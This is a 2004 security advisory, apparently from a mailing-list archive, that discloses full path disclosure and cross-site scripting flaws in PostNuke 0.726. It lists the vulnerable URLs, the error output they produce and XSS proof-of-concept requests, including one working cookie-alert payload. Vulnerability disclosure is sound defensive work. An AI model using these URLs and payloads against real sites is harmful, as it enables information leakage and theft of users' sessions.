[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040421180534.57156.qmail@web21402.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#022 - Multiple vulnerabilities in PostNuke 0.726 Phoenix - part 2]
{================================================================================}
{ [waraxe-2004-SA#022]
}
{================================================================================}
{
}
{ [ Multiple vulnerabilities in PostNuke 0.726
Phoenix - part 2 ] }
{
}
{================================================================================}
Author: Janek Vind "waraxe"
Date: 21. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=22
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PostNuke: The Phoenix Release (0.7.2.6)
PostNuke is an open source, open developement content
management system
(CMS). PostNuke started as a fork from PHPNuke
(http://www.phpnuke.org) and
provides many enhancements and improvements over the
PHP-Nuke system. PostNuke
is still undergoing development but a large number of
core functions are now
stabilising and a complete API for third-party
developers is now in place.
If you would like to help develop this software,
please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server
irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - all blocks in "includes/blocks/" directory are
not secured against direct access
Example:
http://localhost/postnuke0726/includes/blocks/finclude.php
Fatal error: Call to undefined function:
pnsecaddschema() in
D:\apache_wwwroot\postnuke0726\includes\blocks\finclude.php
on line 44
A2 - many scripts in "pnadodb" directory are not
secured against direct access
Example:
http://localhost/postnuke0726/pnadodb/drivers/adodb-access.inc.php
Warning: main(ADODB_DIR/drivers/adodb-odbc.inc.php):
failed to open stream: No such file or directory in
D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php
on line 14
Warning: main(): Failed opening
'ADODB_DIR/drivers/adodb-odbc.inc.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php
on line 14
Fatal error: Class adodb_access: Cannot inherit from
undefined class adodb_odbc in
D:\apache_wwwroot\postnuke0726\pnadodb\drivers\adodb-access.inc.php
on line 19
A3 - full path disclosure in "NS-NewUser" module
http://localhost/postnuke0726/modules/NS-NewUser/user.php
Fatal error: Call to undefined function:
modules_get_language() in
D:\apache_wwwroot\postnuke0726\modules\NS-NewUser\user.php
on line 31
A4 - full path disclosure in "NS-Your_Account" module
http://localhost/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://localhost/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
A5 - full path disclosure in "NS-LostPassword" module
http://localhost/postnuke0726/modules/NS-LostPassword/user.php
A6 - full path disclosure in "NS-Multisites" module
http://localhost/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/head.inc.php
http://localhost/postnuke0726/modules/NS-Multisites/print.inc.php
A7 - full path disclosure in "NS-User" module
http://localhost/postnuke0726/modules/NS-User/tools.php
http://localhost/postnuke0726/modules/NS-User/user.php
B. Cross-site scripting aka XSS:
XSS exploits works on PostNuke only if special
anti-filtering measures are used!
B1 - XSS in "Downloads" module (2 cases)
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss
code here]
http://localhost/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss
code here]
B2 - XSS in "Web_Links" module
http://localhost/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss
code here]
B3 - XSS in "openwindow.php" script
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss
code here]
http://localhost/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to UT Bee Clan members at
http://bees.tk ! "Control point secured!" ;)
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@...oo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ]
------------------------------------
__________________________________
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢
http://photos.yahoo.com/ph/print_splash
Powered by blists - more mailing lists